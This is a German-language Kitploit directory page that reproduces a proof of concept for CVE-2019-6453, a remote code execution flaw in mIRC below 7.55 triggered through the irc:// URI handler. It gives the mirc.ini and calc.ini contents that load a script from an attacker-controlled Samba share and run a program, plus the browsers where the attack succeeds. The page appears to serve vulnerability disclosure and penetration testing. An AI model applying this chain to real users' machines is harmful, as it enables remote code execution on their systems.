Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/andripwn/mirc-cve-2019-6453
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubandripwn/mirc-cve-2019-6453

mIRC-CVE-2019-6453

Berechnungsnachweis für CVE-2019-6453

Repository anzeigen
11vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-6453: RCE bei mIRC <7.55 mittels Argument-Injection durch benutzerdefinierte URI-Protokoll-Handler

[Link zum Write-up]

Wir haben eine Remote Code Execution-Schwachstelle in mIRC über den irc:// URI-Protokoll-Handler gefunden. Da mIRC keine Art von Sigil wie -- verwendet, um das Ende der Argumentliste zu markieren, kann ein Angreifer über einen irc://-Link Argumente an mIRC übergeben und beliebigen Code ausführen, indem er eine benutzerdefinierte mirc.ini von einem vom Angreifer kontrollierten Samba-Dateiserver lädt. Beachten Sie, dass ircs:// auf die gleiche Weise funktioniert.

PoC

Der Proof of Calc benötigt drei Dateien: mirc.ini, calc.ini und poc.html. Wir gehen davon aus, dass auf der Angreiferseite ein Samba-Dateiserver läuft. Im Sinne des Beispiels gehen die folgenden Code-Teile davon aus, dass er auf dem Host 127.0.0.1 läuft (d.h. ersetzen Sie 127.0.0.1 durch die Adresse Ihres eigenen Servers in den folgenden Dateien, um dies auszuprobieren).

mirc.ini

mirc.ini ist eine benutzerdefinierte Konfigurationsdatei, die sich auf dem Dateiserver unter C:\mirc-poc\mirc.ini befinden sollte.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

calc.ini ist eine entfernte Skriptdatei, die sich auf dem Dateiserver unter C:\mirc-poc\calc.ini befinden sollte.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

Ein einfacher Besuch von poc.html sollte funktionieren, vorausgesetzt mIRC ist als Standard-Handler für das irc:// URI-Schema eingestellt und der Browser codiert die Payload nicht. Abhängig vom Browser und Ihrer Konfiguration erhalten Sie möglicherweise trotzdem eine Eingabeaufforderung (bei Firefox nicht der Fall).

root@kitploit:~

PoC-Gif

PoC-Gif

Betroffene Versionen

Dieses PoC läuft für mIRC <7.55.

Sie können das PoC auf Edge 42.17134 (letzte Vorschauversion) und Firefox 64.0.2 (letzte Version) auslösen. Auf Chrome funktioniert es nicht, weil Chrome URI-Protokolle anders behandelt (die URI wird kodiert, bevor sie an die Anwendung übergeben wird).

Tool herunterladen